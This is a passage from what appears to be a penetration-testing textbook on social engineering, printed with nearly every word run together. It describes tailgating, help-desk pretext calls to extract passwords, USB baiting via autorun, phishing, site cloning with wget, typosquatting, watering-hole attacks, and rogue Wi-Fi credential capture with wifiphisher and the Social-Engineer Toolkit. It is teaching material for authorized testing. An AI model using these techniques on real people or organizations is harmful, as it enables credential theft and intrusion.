ommonlyacombinationofmechanismsinadoorlikethis.Thefirstisthebadgeaccess.Youwouldberequiredtoswipeyourbadgeonthereader.Onceyoudidthat,youwouldneedtostepintothedoormechanism.Onceitregisteredthatyouwerethere,itwouldallowforapartialrevolution,justenoughtoallowsomeonethrough.Onewayofgettingaroundthisismakinguseofsomeoneelse’sbadgebeforetheyuseit.Sinceyoumaymistimesteppingintothedoor,youmayneedtoswipeyourbadgemultipletimes,whichmeansthatadoubleswipeiscommonenoughthatit’sallowed.Ifyouhappenedtohaveanaccomplicewithinthecompany,theycouldswipeyouinandthenswipethemselvesinassoonasthedoorhaddischargedyou.Youprobablywon’thavesomeoneontheinsidetoletyouin,though,whichmeansfindinganotherwayaround.Thisiswheredisabilitylawscomein.Obviously,adoorsorestrictiveastonotallowmorethanonepersoninatatime(andoftenbarelyadmitsapersonwithabackpackon)wouldn’tallowsomeoneoncrutchesandcertainlynotsomeoneinawheelchair.So,youmayfindthereisahandicappeddoorallowingbadgeaccesstothebuilding.AcompanyIusedto416 Chapter10  SocialEngineering■workathadthetwosidebyside.Itwaseasytoswipeinusingthehandicappeddoor,anditwouldstayopenforagoodamountoftimebeforeauto-­closing,toensurethatanyonedisabledinsomewayhadtimetogetthrough.Honestly,weusedthehandicapentrancetogettoourcarsintheparkinggaragewhenwewenttolunchwithvendorssotheydidn’thavetogobackthroughthelobby.Wejustusedthisdoorandtheytailgated.Interestingly,theserevolvingdoorscanoperateasasortofmantrapinthesensethatevenifyouweretogainaccessinsomewaytothebuildingwithouthavingabadge,youwouldbestuckinthebuildingbecauseinordertogetout,you’dneedtoswipeyourbadgeagaintooperatethedoor.Thesameprocesswouldhappenonthewayout.Youwouldswipe,thensteponthepad,andthedoorwouldrotatejustaquarterturn,enoughtoletyououtontheotherside.BiometricsIt’slikelyyouhavebeenusingbiometricsforawhileatthispoint.TherehasbeenfacialrecognitiononAndroidsmartphonesforyears.BothAndroidandiOSdeviceshavesupportedfingerprintsforawhile.AppleintroducedFaceIDafewyearsagoasanattempttobebetteratlivefacialrecognition.Oneproblemwithstaticfacialrecognitionisitcouldbefooledbystaticimages,soAppleintroducedalivenesscomponent,meaningitlooksfornonstaticindicatorsinthefacetobecertainit’snotjustaphotoit’slookingat.Androidalsosupportsidentificationusingyoureyes.Biometricsistheuseofaphysicalcharacteristicthatisuniquetoyouasaformofauthentication.Ifyouhaveusedanyofthesemethodstounlockyourphone,youhavebeenusingbiometrics.Thisisaformofphysicalaccesscontrolthatmaysimplybeimpossibletogetby.Thesearesomeofthetypesofbiometricsyoumayrunacross.Fingerprints Fingerprintscannersarecommon,inpartbecausethetechnologyforthemhasbeenaroundforawhile.Therearesomeissueswithfingerprints,includingthefactthatthereadercouldbefooledbyahigh-­resolutionreplicaoftheprint,unlessthereadertakesintoaccountbodytemperature.Bodytemperatureisn’talwaysareliableindicatorsinceitisn’tguaranteedtobeconsistent(everrunacrosssomeonewithreallycoldhands?).IrisScanning Irisscanningisamorerecentversionofeyescanning.Theirisisthepartoftheeyethatcontainsthecolor.Italsochangessizebasedonhowmuchyourpupilhastodilatebecauseoftheamountoflight.Ifyoulookverycloselyatyoureyeor,perhapsbetter,someoneelse’seye,youwillseethattheirisisn’tasolidcolor.Thereisapatterntoit.It’sthispatternthatgetsmatchedtoauthenticateyou.Theirispatternisconsidereduniqueforeachperson.Oneadvantageofirisscanningisthatlightisusedtoilluminatetheeye,soirisscanningcouldworkinthedark.RetinalScanning Thisisalsobasedonyoureye.Theretinaisattheverybackofyoureyeandcontainsthelight-­sensitivecellsthatcreateimpulsesforyouropticnerve.Theretinacontainsapatternfrombloodvessels,whichcanbeusedtoidentifyaperson.PhysicalSocialEngineering 417Voiceprint VoiceprintwasfamouslydemonstratedinthemovieSneakers.Finditifyouhaven’tseenit.Itincludeslotsofideasforsocialengineeringandaveryweirdwaytobreakavoiceprintreader.Therearemanyproblemswithvoiceprintreaders.Oneofthemisthatyourvoicewillchangefromdaytodaybasedonanumberoffactors,includingsimplytimeofday.Also,coldswillaffectyourvoice.Thisisonereasontherearen’talotofsystemsthatwillusevoiceprint,atleastfortheimplementationofasecuritysystem.Theefficacyofbiometricsystemsisbasedonsuccessandfailurerates.Therearetwomeasuresthatareparticularlyimportant.Thefirstisafalsenegative.Afalsenegativemeanssomeonewhoshouldbeallowedaccessisbeingdenied.Thisisnotnearlyasbadasafalsepositive,however.Afalsenegativemayrequireeitheranotherattemptor,atworst,theinterventionofsomeoneelse.Afalsepositivemeanssomeonewhoshouldn’tbeallowedtohaveaccessgetsaccess.Withafalsepositive,yougetunauthorizedpeopleroamingyourfacility.Thetwomeasurescommonlyusedarefalsefailurerates(FFRs)andfalseacceptancerates(FARs).Thereareothertypesofbiometrics,includingpalm-­printscannersaswellashandtopography.Therearereasonsyouaren’taslikelytorunacrossthesetypesofbiometrics.Theyarenotcompletelyreliable.Theremaybewaystobypassthedifferenttypesofbiometrics,butitmaysimplybeeasiertonotevengetintoasituationwherethebiometricsscanscomeintoplay.PhoneCallsThisisn’texactlyphysicalinthewaythatgainingaccesstoafacilityis,butitstillcanbealucrativewaytocollectinformation.Ifitweren’t,youwouldn’tbegettingphonecallsfrom“WindowsSupport”claimingtohavereceivednoticefromyoursystem.Thisisanothercasewherepretextingcanhelpalot.It’salsousefultohavedonealotofreconnaissanceaheadoftimesoyouknowmorethanjustthemainphonenumber.Iftherearemultiplefacilities,gettingphonenumbersforthemwillbeusefulaswell.Thisisespeciallyusefulinacommonpretextingstrategy.Attackerscanjuststartrandomlycallingphonenumbersorextensionswithinanorganization,sayingtheyarefromthehelpdeskorITsupport.Eventually,theywillstumbleacrosssomeonewhoiswaitingforacallbackfromsupport.Theuserwillbegratefulforthecallback,whichreturnsustotheprinciplesnotedearlier.First,thereisreciprocity.Theywillbegratefulforthehelp.Oncepeoplegettothepointofcontactingthehelpdesk,theyarelikelystymiedandfrustrated.Thisisespeciallytrueofunsophisticatedusers,whoareprobablymorepronetoneedinghelpdesksupportandmaypotentiallybechallengedperformingtheactionsneeded,evenwhenguided.Thiscouldmakethemespeciallygratefulforacallback,mostparticularlyifyouareabletomaketheirproblemgoaway.Thesecondprincipleinthiscaseisthatofauthority.Aspartofthehelpdeskteam,youhavepermissionsandknowledgetheydon’thave.Thismeansyouhavesomeauthority.Asnoted,peoplearelikelytofollowthedirectionsofthosewhohaveauthority.Ifyouwereto418 Chapter10  SocialEngineering■suggestyouneededausernameandpasswordtoauthenticatethem,theymaybewillingtogivethatinformationup.Companiesregularlyputemployeesthroughtraining,typicallyannually,tohelpthemrecognizesocialengineeringscams.Thiscanpotentiallymakethejobharder,thoughnotimpossible.Ithelpstohaveaplausiblestory.Ithelpsevenmoreifyouhavedetailsaboutthecompanythatyoucanfeedpeopleontheinsidetomakeitseemmorelikeyoureallydoworkforthecompany,makingyoumoretrustworthy.BaitingPeoplelovefreethings.Ifyou’veeverbeentoanIT-­relatedconferenceorconvention,youmayhavenoticedthelonglinesofpeoplewaitingtograbwhatevercompaniesaregivingaway,regardlessofwhethertheyneeditornot,orwhetherit’suseful.Afterall,howmanystresstoyscanyoupossiblyhave?Whyisthisrelevant?Youcantakeadvantageofthis.ItusedtobeyoucouldleaveCDsaroundtoseeifpeoplewouldpickthemup.Hand-­labelthemwithsomethinginteresting—­maybeeventhenameofabighitalbum.Otherwise,youcouldgiveitthenameofsometantalizingsetofdata.Anythingthatwouldencouragesomeonetograbthediscandputitintotheircomputertoseewhatwasreallyonit.Ofcourse,oftencomputerstodaydon’thaveCD-­ROMdrivesinthem,soleavingCDsarounddoesn’tdoalotofgood.Thisdoesn’tmeanyoucan’tstillmakeuseofthefactthatpeoplelovefreestuff.Ifyouweretoseea128 GBUSBsticksittingintheparkinglot,forinstance,whatwouldyoudo?Evensomethingsmaller,whatwouldyoudo?Afairlysubstantialnumberwouldlookaroundtoseeiftherewasanyonenearbywhomighthavedroppedit,andthentheywouldpickitup.Alotofpeoplewillinsertthestickintotheircomputertoeitherseewhat’sonitorformatitsotheycanuseitthemselves.Freestuff,afterall.Whocouldn’tusea128 GBUSBstickfortransportingdataorbackingupdata?Ofcourse,notjustanyUSBstickwilldo—­certainlynotablankUSBstick.Whatyouneedtodoisinsertsomesoftwareonthestickthatwilldosomethingusefulforyou.Thismayincludeprovidingyouwithremoteaccesstotheuser’ssystem.Youcan’trelyonuserstojustrunthesoftwareyouhaveleftonthestick,though.Youcan,though,makeuseoftheautorun.inffiletohaveyourprogramrunautomaticallyifthestickisinsertedintoacomputerthathasautorunenabled.Notallcomputerswillhavethat,ofcourse.It’sacommonhardeningtechniquetopreventanyremovablediskfromautomaticallyrunninganything.Thisisanotherareawhereusersarecommonlytrained.Again,though,youmaybeabletogetpeopletoignoretheirtrainingifyoumakethebaityouhaveleftbehindespeciallytantalizinginsomeway.Thesedays,reallylargeUSBsticksdon’tcostalotofmoney,soitmaybeagoodinvestmenttogetsomethatyoucanleavearound.PhishingAttacksYou’relikelyfamiliarwiththeseattacks.You’veprobablyseenthemalotifyouareasecurityprofessionalorevenifyouarejustsomeonewhohasbeenusingacomputerforafewyears.Ifyoudon’tfeellikeyou’veseenaphishingattack,openyourJunkfolderinyourPhishingAttacks 419emailprogram.Thereisagoodchanceyouwillfinddozensofthem.Attheleast,youshouldbeabletofindonethere.Ifyoudon’thaveoneandfeellikeyouaremissingout,youcanhaveoneofmine.YoucanseeanexampleofaphishingemailinFigure 10.3.FIGURE 10.3 PhishingemailTherearemanycharacteristicsofthisemailthataresuspicious.ThefirstisanemailtellingmeI’vewonalargeamountofmoney.AllIhavetodotogetthemoneyisprovidemypersonalinformation.Anofferoffreemoneyimmediatelymakesmesuspicious.AskingmeforpersonaldetailsforwinningalotteryIdidn’tenteralsomakesmesuspicious.Afterall,ifIwasselected,whydon’ttheyalreadyhavemyinformation?AnotheronethatraisesahugeflagformeisthesuggestionthatIshouldcontactabarristerintheUnitedStates.TheUnitedStateshaslawyers,notbarristers.AcompanywhohadalawyerintheUnitedStateswouldknowthat.Thegrammarisalsoahint.Ifyouseesuspiciousgrammar,youshouldbesuspiciousoftheemail.Justaskingforcontactinformationisfairlylowgradeforaphishingattack.Itseemsunlikelytobeparticularlysuccessful.However,419scamsstilldosucceed,sotheycontinue,inmanyforms.Thereisatheorythatpeoplewhoarelikelytofallforsuchapoorlyconstructedscamself-­select.Iftheyarelikelytobelievethescam,theyareprobablylikelytogiveupmoneytoattackers.420 Chapter10  SocialEngineering■Betterphishingemailsarethosethatareconstructedtolookcompletelylegitimate,aslongasyouaren’tlookingtooclosely.Thesesortsofattacksaremorelikelytosucceed,andtheyaren’tespeciallydifficulttoputtogether.YoucanseeanexampleofthissortofphishingemailinFigure 10.4.ThisisanemailconstructedtolooklikeawarningfromWellsFargo.IfIweretodobusinesswithWellsFargo,thiswouldbeanemailthatI’dlookatveryclosely.Thereareelementsthatareconvincing.ThegraphicsareexactlythesortsofgraphicsI’dexpecttoseeinanemailfromWellsFargo.It’sevenwordedreliably.Wetickatleastoneboxwiththismessage.First,wegetauthority.Itsaysit’sWellsFargo.Second,thereisreciprocity.We’llfeelgratefulthatwewerewarnedaboutapotentialcompromiseofourbankingaccount.Lookingatthemessagemoreclosely,though,itbecomesmoresuspicious.HoveringoverthelinkinthemessageturnsupaURLthathasnothingtodowithWellsFargo.Also,theemailaddressinthesenderfieldisbogus.Itdoesn’tevenlooklikeanemailaddress.Interestingly,thereisasecondlinkinthemessagewheretheURLisseenonlyifyouhoveroverthelink.ItalsohasnothingtodowithWellsFargo,butstrangely,itisalsodifferentfromtheURLthatyoucansee.Oddsare,iftheURLsevenwork,theywillleadtoasitethateitherasksforauthenticationinformationorsuppliesmalwaretothesystem.Itcouldbeboth.Whynotgatherbankinginformationatthesametimeyouinstallaremoteaccessprogram?Phishingisusefulasastrategy.It’slucrative,asyoucantellbythenumberofemailmessagesyoumayhaveinyourJunkemailfolder.Again,ifyoudon’thavealotofthem,youcantakemywordforit.Myemailaddresshasbeenaroundlongenoughandisjustwellknownenough(notbecauseofmebutbecauseofwhattheaddressitselfis)thatIlikelyhavemorethanenoughinjustthelastmonthforbothofus.Ifyouaretargetingpeoplewhoworkforaparticularcompany,youhavemovedbeyondphishingandgonetospearphishing,whichmeansyouaren’tusingashotgunapproachtryingtohitasmanytargetsacrossabroadareaasyoucan.Youareusingaspeartogetyourtarget.Phishingemailmessagesmayincludeattachments.Thesemessagesmayshowupinmanyforms.AcommonapproachIhaveseeninthepastistosendanattachmentdisguisedasaninvoice.Youaredirectedtoopentheinvoicesoyoucanpaythebill.Figure 10.5showssomethingalongtheselines,purportedlyfromApple.OftentheseattachmentsarePDFdocuments.IntheemailinFigure 10.5,it’slikelytheattachmentwasaPDFbuttheattachmentwasstrippedoutbyanti-­malwaresoftwareontheserverside.ImplementationsofPDF,and,toadegree,theformatitself,haveahistoryofvulnerabilities.Thereisagoodchancethatareaderthatthetargetmaybeusingcanbeexploited.It’salsoaloteasiertogetpeopletoopenaPDFthanaplainexecutable.Usersarewellawareofthedangersofopeningprograms.TheymaybemorelikelytothinkthatPDFscan’thurtthem,wheninfacttheycan.ThePDFformatitselfhastheabilitytoexecuteanembeddedexecutable.PhishingAttacks 421FIGURE 10.4 WellsFargophishingemailPhishingattacksareanimportantpartofapenetrationtestorredteamengagement.ItcanbeusefultohaveatoolsuchasFiercePhishthatwillhelpmanageyourengagements.FiercePhishprovidesawebinterfacetomanageallofyoursocialengineeringcampaigns.Usingthewebinterface,youcanmanageyourtargetlistsaswellasallthetemplatesyouwanttouse.Youmaybeabletocreatetemplatesthatyoucanreusewithdifferenttargets.Afterall,someofthemosteffectivesocialengineeringattacksarelikelytobethosethathavesomebenefitforthevictim.Thinkaboutemailsthatmaybeofferingthetargetsomething.Thismayusenaturalgreedagainstthevictim.Youcoulduselotterywinningsorsomesortofrefund.422 Chapter10  SocialEngineering■FIGURE 10.5 PhishingemailwithattachmentWebsiteAttacksEvenifyouweretouseaphishingattack,youmayverywellneedasecondelement.Youcouldincludemalwareinyourphishingattack,whichcouldgetyouaccesstothetargetsystem.Thatmaybemorecomplicatedthanyouwantbecauseitwouldrelyoneithertheuseropeninganattachmentortheattachmenttakingadvantageofavulnerabilityinthesystem.Itcanbeeasiertogetuserstoclicklinksthanitcanbetogetthemtoopenattachments.Thisisespeciallytrueiftheemaillookslegitimateandthelinklookslegitimate.Thismeans,though,thatyouneedawebsitesomewheretowhichtheuserscanconnect.Ifyouarephishingasyourentrypoint,youmaystartwithasiteclone,whichwouldlooklikealegitimatesitesowhentheuserconnects,theydon’tsuspectanything.TherearelotsofwaystogetaURLtolooklikeitmaybelegitimate.Youcouldregisterahostnamelikewww.microsoft.com.rogue.com,whichmayletpeoplethinktheyareconnectingtoMicrosoft’ssitewheninfacttheyareconnectingtothehostidentifiedbythehostnameinthedomainrogue.com.Usersdon’talwaysseetheentirehostnameorURLandprobablydon’tunderstandenoughaboutthestructureoffullyqualifieddomainnames(FQDNs)tounderstandwhattheyarelookingat.WebsiteAttacks 423Thisisn’ttheonlytypeofattackyoumightusewhenitcomestosocialengineering.Phishingisn’ttheonlyentrancevector.Youcanalsotakeadvantageofthewaypeoplecommonlybrowse.Withthisapproach,youcanjustallowpeopletocometoyoursitewithouttryingtoencouragethem.Youmaystillneedtousethesitecloningtechnique,however.Ultimately,youdon’twanttoarousesuspicions,soyouarebetteroffdoingasmuchasyoucantomakesomethingappearlegitimate.Itwillgiveyoumoretimetoeithergatherinformationorgetyourpayloadtoyourtarget.CloningSitecloningisanincrediblyeasythingtodo.Infact,youdon’tevenneedtoclonetheentiresite.YoujustneedtheHTMLcodethatmakesrenderingthepagepossible.Leavinganymediafilesintheiroriginallocationsisfinebecauseyoucantakeadvantageofanyupdatestothemif,forsomereason,theychange.Itwilllendmorecredibilitytoyourclonedsiteactually.Ifanyonewerepayingattention,theywouldseetherequestsgoingtothelegitimatesitesratherthanyourroguesite.TheonlyfilethatwouldbecomingfromyourroguesiteistheHTMLthatcontrolstherenderingofthepage.Thisisnottosaythatyoucouldn’tgrabthefilesandhostthemlocally.WithatoollikeWinHTTrack,it’saconfigurableoption,asyoucanseeinFigure 10.6.FIGURE 10.6 WinHTTrackoptions424 Chapter10  SocialEngineering■Theoptionsareoptional,ofcourse.Bydefault,WinHTTrackwon’tgrabmediafilesbutwillonlygrabtheHTMLfromasite.Itwillclonetheentiresite,though,whichmeansittraverseslinks.WinHTTrackusesprojectstoclonesites,soit’samultistepprocesstopullawebsite.InFigure 10.7,youcanseethestepinwhichyouwouldentertheURL.YoucouldalsoentermultipleURLsifyouwantedtodownloadmultiplesites.YouwouldhavetochangetheactiontoDownloadAllSitesInPages.YoucouldalsouseWinHTTracktotestsitesratherthandownloadingthem,whichmeansyoucouldcheckalistofbookmarkstoseeiftheywerestillvalid.Ifyouprefercommand-­linetools,though,thereareacoupleyoucoulduse.Oneofthemiswget,whichisaprogramthatisusedtomakeweb-­basedrequestsandgetfiles.Youcouldusewgettodownloadfilesfromthecommandline.OnaLinuxsystem,youcouldgrabtarballsofsourcecode,packagefiles,oranyfilethatwouldn’tneedtoberendered.YoucanusewgettodorecursiveGETrequeststoawebserver,whichiswhatyouwouldneedtomirrorasite.ThismeanswgetpullstheHTMLpageatthetopofthesiteandsavesit.Itthenlooksforalltheanchortagsinthepageandfollowseachoftheminturntogetthosepagesorfiles.Inthefollowingcodelisting,youcanseearunofwgetusing-­mtotellwgettomirrorthesite,meaninggrabtheentiresite.FIGURE 10.7 SitecloningwithWinHTTrackWebsiteAttacks 425Usingwgetto MirrorWebsite[email protected]:~#wget-­mhttps://www.wiley.com-­-­2021-­01-­2307:05:43-­-­https://www.wiley.com/Resolvingwww.wiley.com(www.wiley.com)...143.204.29.19,143.204.29.108,143.204.29.24,...Connectingtowww.wiley.com(www.wiley.com)|143.204.29.19|:443...connected.HTTPrequestsent,awaitingresponse...301MovedPermanentlyLocation:/en-­us[following]-­-­2021-­01-­2307:05:43-­-­https://www.wiley.com/en-­usReusingexistingconnectiontowww.wiley.com:443.HTTPrequestsent,awaitingresponse...200OKLength:unspecified[text/html]Savingto:'www.wiley.com/index.html' www.wiley.com/index[]85.83K-­-­.-­KB/sin0.08s Last-­modifiedheadermissing-­-­time-­stampsturnedoff.2021-­01-­2307:05:44(1.08MB/s)-­'www.wiley.com/index.html'saved[87888] Loadingrobots.txt;pleaseignoreerrors.-­-­2021-­01-­2307:05:44-­-­https://www.wiley.com/robots.txtReusingexistingconnectiontowww.wiley.com:443.HTTPrequestsent,awaitingresponse...200OKLength:817[text/plain]Savingto:'www.wiley.com/robots.txt' www.wiley.com/robot100%[===================>]817-­-­.-­KB/sin0sIfyouwantedtohaveaccesstothesiteoffline,youcouldusecommand-­lineswitchestomakethelinksrelative.Forourpurposes,though,wewouldwanttohavethesiteavailablethroughourownwebserver,sowe’rejustgoingtomirrorthesite,keepingeverythingthewayitis.Anothercommand-­lineprogramthat’ssimilartowgetiscURL.Unfortunately,cURLdoesn’thavebuilt-­infunctionalitytopullacompletewebsite,inspiteofeverythingcURLiscapableof.Youcould,though,writeashortscriptthatwouldpullthesite,andtherearesuchscriptsavailableonlineforpeoplewhoprefertousecURLoverwget.Onceyouhavethepagesforthesiteinplace,youwouldneedtomakeanyadjustmentstothesourcecode.Thiswouldincludeinsertingyourmaliciouscodesoitcouldbedownloadedandthenincludingareferencetoitinoneofthepagesinthesite.Onceyouhavethe426 Chapter10  SocialEngineering■site,youcouldsendtheURLforapagetoatarget,potentiallyinanemail.Whenitcomestosocialengineering,youwillsometimesfindmultiplelayersintheattack.RogueAttacksAroguewebsitewouldbeonethatausermayexpecttobelegitimatewheninfactithasamaliciouspurpose.Thiscouldbeasitethatlooksexactlylikealegitimatesite,usingthesite-­cloningtechniquementionedearlier,buttheURL,meaningthefullyqualifieddomainname,isdifferentthantheusualURL.Therearesomehostnamesthatarecommonlymistyped.Attackerscanregisterthesecommontyposasdomainnamesthemselvesandwaitforpeopletocomevisit.Thetacticiscalledtyposquatting.Youcould,forinstance,registergogle.comanddoasitecloneofgoogle.com,servinguppagesataserverthathostsyourgogle.comsite.YoumayalsohearthistacticreferredtoasURLhijacking.Roguedoesn’tnecessarilymeanyou’vecreatedafakesite,though.Itcouldmeanthatyouareusingalegitimateplatformtostageyourattackwithoutthelegitimateplatformknowinganything.Awateringholeattackisasocialengineeringattackthatmakesuseofthefactthattherearesitesthatpeoplewillcommonlyvisit.Awateringholeinthewildisaplacewhereanimalscometovisitalotandmaybeevenhangaround.It’saplaceanimalsareguaranteedtocome;becausewaterissoessentialtolifeandnotallanimalsget allthewatertheyneedfromtheirfood,thewateringholeisagreatplacetowaitforanimalstovisit.Thesameistruewiththissortofattack.Withawateringholeattack,youwouldgainaccesstoawebsitethatalotofpeoplevisitandintroduceinfectedsoftwaretoit.Thisisnottosaythisisaneasyattacktoexecute,butbyusingityouhavethepotentialtogainalotofsystemsquickly.Ratherthanjustgainingaccesstoasinglesystem,ifyoucompromiseawebsitethat’svisitedalotbythepeopleyouarelookingtogetinformationoutof,youcangainaccesstoalotofsystemsbycompromisingasinglesystem.Onceyougetoverthehurdleofcompromisingthewebsite—­forexample,ifyouweretocompromiseespn.com,youwouldgetalotofmeninparticularstoppingbyonaregularbasis—­introducingtheattackiseasy.Asanexample,inthefollowingcodelistingyoucanseeacoupleoflinesintroducedatthebottomofanindex.htmlpage.AttackHTMLwith AppletReference Thisdoesrequirethatyouhaveanappletthatyoucanuse,thoughtheycanbeeitherfoundorcreated.Aswithsomanyotherthings,Metasploitcanbeusedforattackpayloadslikethis.ThisHTMLfragmenttellsthebrowsertoloadtheJavaclassfoundintheJavaWirelessSocialEngineering 427archive(JAR)hkFKIKkhSvSHss.jar.Thisisarandomlygeneratedfilename.IncludedinthisattackisareverseconnectionbacktoanIPaddressthatwasloadedintotheattack.Wateringholeattacksarenottheonlyweb-­basedattacksyou’llsee,buttheyhavetheadvantageofbeingtargeted.Theyareprobablymoreusefulwhenworkingwithanorganization.Youcouldloadupanattackintotheintranetserver,ifthecompanyhasone,sinceit’sthesortofsiteemployeeswillregularlyvisit,andyoucouldpotentiallygatheralotofdesktopsystemsfromthecompromisedhost.WirelessSocialEngineeringWi-­Finetworkshavebecomeubiquitous,andwithsomanydevicesnotevenhavingthecapabilityofsupportingawiredconnection,thereisgenerallyanexpectationthattherewouldbeaWi-­Finetworkavailableforpeople.Thisissomethingelseyoucantakeadvantageof.YoucanfindalonglistofWi-­Finetworksinmostplaces.Justsittinginmylivingroom,inasmallcommunity,thereisalistofalmosttwodozenWi-­Finetworksavailable.YoucanseethelistinFigure 10.8.Therearenorestrictionsinnamingthesenetworks.Thereisnocentralplacetoregisterthenames.Youcanevenhaveoverlappingnameswithinthesamephysicalspace.Itbecomesuptotheclienttryingtoconnecttodeterminewhatnetworktoactuallyconnectwith.FIGURE 10.8 ListofWi-­FinetworksYoucantakeadvantageofthislackofanywaytoknowwhatnetworktouse,sinceevenifyoucheckthebaseservicesetidentifier(BSSID),youcan’ttellanythingfromit.ItjustappearstobeaMACaddress.YoucaneasilycreatearogueWi-­Finetwork,whichprovidesalotofinterestingpossibilities,especiallywhenitcomestogatheringusernamesandpasswords.428 Chapter10  SocialEngineering■Wirelessnetworkswereinitiallythoughttobeinferiortophysicalnetworksbecauseitwassoeasytogatherthesignalsoutoftheair.Thisisdefinitelytrue.Wehavenoabilitytorestrictwhocanreceivethewirelesssignalsoncetheyhavebeentransmitted.Asawaytoprotectthetransmissionsfromcapture,therehavebeenmultipleattemptsatencryptingthetransmissions.ThefirstwasWiredEquivalentPrivacy(WEP).Thismechanismhadseveralproblems,leadingtoWEPtransmissionsbeingeasilydecrypted.Thefollow-­ontothatwasWi-­FiProtectedAccess(WPA),whichattemptedtocorrectsomeoftheissueswithWEP.WPAdidn’twhollysucceed,soitwasfollowedwithWPA2.WEPusedapre-­sharedkey(PSK)toprovideawaytoauthenticateusers.WPAintroducedenterpriseauthentication.ThismeansWPAandWPA2couldacceptusernamesandpasswordsforauthenticationbeforebeingallowedtoconnecttothenetwork.Thisisnottheonlywaytoauthenticateusers,ofcourse,butitisoneofthem.Generally,ausernameandpasswordusedinawirelessnetworkatacompanywouldbethesameusernameandpasswordusedtoauthenticateagainstthenetworkservers,sincethoseservers,forinstanceActiveDirectoryservers,generallyhandleauthenticationfortheenterprise.Insomecases,youwouldjustconnecttoaWi-­Finetwork,anditwouldbringupsomethingcalledacaptiveportal.Acaptiveportalisbasicallyalimited-functionalitywebpagethatoftenprovideseditboxesforauthenticationcredentials.Youwillfindthesesortsofthingsinhotelsandsometimesairports.Atahotel,youmaybeexpectedtologinwithloyaltycredentials,oryoumayhavetoprovideyourlastnameandroomnumberasawaytoproveyouarereallyahotelcustomer.Thisisanotherplacewhereyoucangathercredentialsfromusers.Eitherway,usersareexpectedtoauthenticate,andyoucaneasilydosomereconnaissancebygettingcloseenoughtothebuildingtogetthenetworksignalandthentrytoconnecttothenetworktoseehowitbehavesonaconnectionattempt.Youcanconfigureamethodtograbpasswordsfromusers.Thissetupdoestakesomeskillandeffort.KaliLinuxwillhaveallthetoolsyouneed,includinghostapdandiptables.Theprogramhostapdturnsyourwirelessinterfaceintoanaccesspoint,andiptablesisusedtoroutetrafficfromyourwirelessinterfacethroughanotherinterfacetotheInternet.Youcouldthenuseotherprogramstocapturetraffictogettheauthenticationcredentials.Anotherapproachwouldbetousewifiphisher.Thisisaprogramthatwilldoalotoftheworkforyou,includingcreatingascenariothatwouldallowyoutoinstallsoftwareontothetargetsystem.Thedocumentationonlineisout-­of-­date.Ratherthanpassingeverythinginonthecommandline,it’sjustaseasytorunitwithoutanycommand-­lineparametersandthenmakeyourselectionsastheprogramwalksyouthroughyourchoices.Startingitup,youcanseeitsetsupapairofwirelessinterfaces;thenitstartsupaDynamicHostConfigurationProtocol(DHCP)serverandiptables,bothofwhichwouldbeneededtomakeitseemasthoughusershadlegitimatelyconnectedtoanaccesspoint.StartingWifiphisher[email protected]:~$sudowifiphisher[*]StartingWifiphisher1.4GIT(https://wifiphisher.org)at2021-­01-­2501:21WirelessSocialEngineering [+][+][+][+][+][+][+][*]429Timezonedetected.Settingchannelrangeto1-­13Selectingwfphshr-­wlan0interfaceforthedeauthenticationattackSelectingwlan0interfaceforcreatingtherogueAccessPointChangingwlan0MACaddr(BSSID)to00:00:00:9e:e7:b5SendingSIGKILLtowpa_supplicantChangingwlan0MACaddr(BSSID)to00:00:00:3e:48:01Changingwlan1MACaddrto00:00:00:cc:3f:74Clearedleases,startedDHCP,setupiptablesOnceyoustartwifiphisher,itbringsupalltheSSIDsthatareinrangeofyoursystem.ThisiswhereyouwouldselecttheSSIDyouwantedtospooftogathercredentials.YoucanseethisselectioninFigure 10.9.Asitsaysonthescreen,youarrowdowntoselecttheSSIDyouwanttospoofandthenpressEntertoselectit.Youmayhavenoticedintheprecedingoutputthatoneofthewirelessinterfaceswasgoingtobeusedforthedeauthenticationattack.Thismeansthataswifiphisherruns,itwillsenddeauthenticationframestosystemsthatappeartobeconnectedtotherealaccesspoint.Thiswouldforcethoseclientstoreauthenticate,ideallyauthenticatingwithyou.FIGURE 10.9 wifiphisherSSIDselectionOnceyouhaveselectedtheSSIDyouplantospoof,wifiphisherwillaskyoutoselectthetypeofattacktouse.InFigure 10.10,youcanseethechoicesforwhatscenariouserswillbepresentedwith.Thetemplateselectedwilldeterminewhatyougetfromyourtarget.TheOAuthpagewillallowyoutogathercredentials,whileothertemplates,includingthebrowserplug-­in,willallowyoutogetsomecodeontothetargetcomputer.Thiscouldberemoteaccesssoftware,forinstance.Aswithsomanyotherthings,itcomesdowntowhatyouaretryingtoaccomplishwiththistypeofattack.430 Chapter10  SocialEngineering■FIGURE 10.10 wifiphisherattacktemplateselectionWhenitcomestowireless,therearesomanymovingpiecesneededtomakeitworkeffectively,meaningthewholesetupwouldworkinawaythatitwouldn’tcausemuchsuspiciononthepartoftheuser,whichmaypreventthemfromgettingasecurityteaminvolvedtoidentifyyourrogueaccesspoint.Itisdefinitelybettertouseautomatedtoolstodoyourwirelesssocialengineeringattacks.Thisisnottosay,though,thatyouneedtoalwaysusemanualmethodsforothersocialengineeringattacks.Thereareotherwaystoautomatesocialengineering.AutomatingSocialEngineeringSincephishingisoneoftheeasiestandmostpredominantattacksseeninthewild,wecanstartwithautomatingphishingattacks.We’regoingtoturntoMetasploittohelpuswiththis,butmorespecifically,we’lluseaprogramthatisanoverlayontopofMetasploitcalledtheSocial-­EngineerToolkit(SET).Thisisamenu-­basedprogramthatusesmodulesandfunctionalityfromMetasploitbutpullsitalltogetherautomaticallyforyoutoaccomplishtasksnecessaryforsocialengineeringattacks.Inthefollowingcodelisting,youcanseetheinitialmenuforSET.Thisisaprogramthathasalotofcapability,butwe’regoingtolimitourlookatitratherthandoingadeepdiveintoeverythingitcando.StartingMenuin Social-­EngineerToolkitTheSocial-­EngineerToolkitisaproductofTrustedSec. Visit:https://www.trustedsec.com It'seasytoupdateusingthePenTestersFramework!(PTF)Visithttps://github.com/trustedsec/ptftoupdateallyourtools!  AutomatingSocialEngineering 431Selectfromthemenu: 1)2)3)4)5)6)Social-­EngineeringAttacksPenetrationTesting(Fast-­Track)ThirdPartyModulesUpdatetheSocial-­EngineerToolkitUpdateSETconfigurationHelp,Credits,andAbout 99)ExittheSocial-­EngineerToolkit 